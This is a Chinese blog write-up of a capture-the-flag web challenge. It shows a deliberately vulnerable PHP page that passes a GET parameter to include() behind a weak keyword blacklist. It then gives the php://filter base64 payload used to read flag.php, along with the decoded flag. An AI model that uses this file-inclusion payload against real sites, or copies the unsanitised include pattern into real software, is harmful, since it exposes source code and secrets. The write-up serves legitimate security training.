[极客大挑战 2019]Secret File

最新推荐文章于 2023-04-19 20:36:29 发布

丙戌年1101

最新推荐文章于 2023-04-19 20:36:29 发布

阅读量267

点赞数

分类专栏：靶场练习文章标签： php 网络安全 web安全

本文链接：https://blog.csdn.net/weixin_41571993/article/details/127163755

版权

靶场练习专栏收录该内容

23 篇文章 0 订阅

订阅专栏

解题过程

首先查看网页源码，在其中发现了一个提示页面——Archive_room.php：

在这里插入图片描述

访问该页面并且抓包得：

在这里插入图片描述

出现了一个页面链接，点击该链接并抓包：

在这里插入图片描述

回显页面出现了一个提示文件——secr3t.php，访问该页面得：

在这里插入图片描述

出现了一行php代码，分析该代码：

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);	
    error_reporting(0);
    $file=$_GET['file'];	//需要以 GTE 方式传入一个参数 file
	// 对传入的参数进行过滤，当出现 ../、tp、input、data 等字符的时候，退出
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 	// 出现 include() 函数，说明是文件包含漏洞，且下面提示了 flag 放在了 flag.php 文件中
//flag放在了flag.php里
?>
</html>

我们这里很容易想到利用 PHP 的封装协议对 flag.php文件中的内容进行编码并显示，故使用Payload——secr3t.php/file=php://filter/convert.base64-encode/resource=flag.php，得到回显：

在这里插入图片描述

其中存在一长串编码：

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7NWQ0ZGNlNDgtNGM5Yi00Y2YyLWJjMTctYmVkY2JmMTZkYmU3fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

base64 解码得：

<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>
    <body style="background-color:black;"><br><br><br><br><br><br>   
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br>        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{5d4dce48-4c9b-4cf2-bc17-bedcbf16dbe7}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>
</html>